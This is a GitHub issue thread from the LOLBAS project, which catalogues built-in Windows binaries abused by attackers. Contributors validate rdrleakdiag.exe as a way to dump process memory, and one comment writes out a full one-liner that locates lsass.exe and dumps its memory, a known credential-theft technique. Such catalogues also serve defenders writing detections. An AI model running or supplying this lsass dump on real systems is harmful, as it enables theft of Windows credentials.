### ISSUE TITLE
Validate process dump method: rdrleakdiag.exe

### ISSUE THREAD

**Issue by ConsciousHacker** [LOLBAS-Project/LOLBAS#84]
`rdrleakdiag.exe /p <pid> /o <outputdir> /fullmemdmp /wait 1`

Source: https://twitter.com/0gtweet/status/1299071304805560321?s=21

**Comment by gtworek** [comment]
Please do remember about "/snap" instead of "/wait 1" for subsequent dumps. I had some replies on twitter with an information it works only once, and "/snap" looks like a kind of solution for this.

**Comment by ConsciousHacker** [comment]
Will do, thanks for the information!

**Comment by M4ximuss** [comment]
FYI, you can skip running "wait" for the first run, if you run enable first. This has the added benefit of working regardless of what was already run;

`for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rdrleakdiag.exe -p %J -enable & sleep 1 & rdrleakdiag.exe -p %J -o c:\users\maximus\desktop\dumps -fullmemdmp -snap`

I found the sleep was necessary to give the diagnostics engine/feature/module(?) time to start before running the dump.

**Comment by tsamuels-r7** [comment]
I just validated this process dump method. Please consider adding this native windows binary to the LOLBAS project. 

`C:\WINDOWS\system32>rdrleakdiag.exe /p <PID> /o <PATH> /fullmemdmp /snap`

**Comment by noob-Engle** [comment]
winserver 2019 Copy execution not successful

**Comment by gtworek** [comment]
May work if you try again replacing "/wait 1" "with "/snap"
I have tested it on 10.0.17763.379.

**Comment by wietze** [comment]
#216 has added rdrleakdiag.exe, I'm closing this issue for now.

**Comment by JackofShadows1337** [comment]
It`s not working now
